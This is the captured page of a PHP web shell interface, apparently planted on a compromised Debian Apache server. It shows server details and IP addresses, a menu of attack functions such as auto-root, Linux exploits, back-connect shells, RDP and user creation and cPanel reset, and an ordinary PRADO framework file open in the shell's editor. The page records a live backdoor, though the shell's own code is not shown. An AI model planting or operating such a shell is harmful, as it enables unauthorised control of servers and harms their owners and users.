Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.219.12.88
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Web /
UI /
JuiControls /
[ HOME SHELL ]
Name
Size
Permission
Action
IJuiOptions.php
635
B
-rw-r--r--
TJuiAutoComplete.php
12.69
KB
-rw-r--r--
TJuiAutoCompleteEventParameter...
1.32
KB
-rw-r--r--
TJuiAutoCompleteTemplate.php
959
B
-rw-r--r--
TJuiCallbackPageStateTracker.p...
1.47
KB
-rw-r--r--
TJuiControlAdapter.php
2.69
KB
-rw-r--r--
TJuiControlOptions.php
4.72
KB
-rw-r--r--
TJuiDatePicker.php
8.36
KB
-rw-r--r--
TJuiDialog.php
5.4
KB
-rw-r--r--
TJuiDialogButton.php
2.54
KB
-rw-r--r--
TJuiDraggable.php
4.25
KB
-rw-r--r--
TJuiDroppable.php
5.57
KB
-rw-r--r--
TJuiEventParameter.php
2.46
KB
-rw-r--r--
TJuiProgressbar.php
3.63
KB
-rw-r--r--
TJuiResizable.php
4.33
KB
-rw-r--r--
TJuiSelectable.php
6.42
KB
-rw-r--r--
TJuiSelectableTemplate.php
952
B
-rw-r--r--
TJuiSlider.php
4.39
KB
-rw-r--r--
TJuiSortable.php
7.77
KB
-rw-r--r--
TJuiSortableTemplate.php
942
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TJuiDialogButton.php
<?php /** * TJuiDialog class file. * * @author David Otto <ottodavid[at]gmx[dot]net> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Web\UI\JuiControls; use Prado\Web\UI\TControl; use Prado\Web\UI\ActiveControls\ICallbackEventHandler; use Prado\Web\UI\ActiveControls\IActiveControl; use Prado\Web\UI\ActiveControls\TActiveControlAdapter; use Prado\Web\UI\ActiveControls\TCallbackEventParameter; use Prado\Web\Javascripts\TJavaScriptLiteral; /** * TJuiDialogButton class * * This button must be child of a TJuiDialog. It can be used to bind an callback * to the buttons of the dialog. * * <code> * <com:TJuiDialog> * > * Text * <com:TJuiDialogButton Text="Ok" OnClick="Ok" /> * * </com:TJuiDialog> * </code> * * @author David Otto <ottodavid[at]gmx[dot]net> * @since 3.3 * @method TActiveControlAdapter getAdapter() */ class TJuiDialogButton extends TControl implements IActiveControl, ICallbackEventHandler { /** * Creates a new callback control, sets the adapter to * TActiveControlAdapter. If you override this class, be sure to set the * adapter appropriately by, for example, by calling this constructor. */ public function __construct() { parent::__construct(); $this->setAdapter(new TActiveControlAdapter($this)); } /** * @return \Prado\Web\UI\ActiveControls\TBaseActiveCallbackControl standard callback control options. */ public function getActiveControl() { return $this->getAdapter()->getBaseActiveControl(); } /** * Array containing defined javascript options * @return array */ public function getPostBackOptions() { return [ 'text' => $this->getText(), 'click' => new TJavaScriptLiteral( "function(){new Prado.Callback('" . $this->getUniqueID() . "', 'onClick');}" ), ]; } /** * @return string caption of the button */ public function getText() { return $this->getViewState('Text', ''); } /** * @param string $value caption of the button */ public function setText($value) { $this->setViewState('Text', $value, ''); } /** * Raises the OnClick event * @param object $params event parameters */ public function onClick($params) { $this->raiseEvent('OnClick', $this, $params); } /** * Raises callback event. * raises the appropriate event(s) (e.g. OnClick) * @param TCallbackEventParameter $param the parameter associated with the callback event */ public function raiseCallbackEvent($param) { if ($param->getCallbackParameter() === 'onClick') { $this->onClick($param); } } }
Close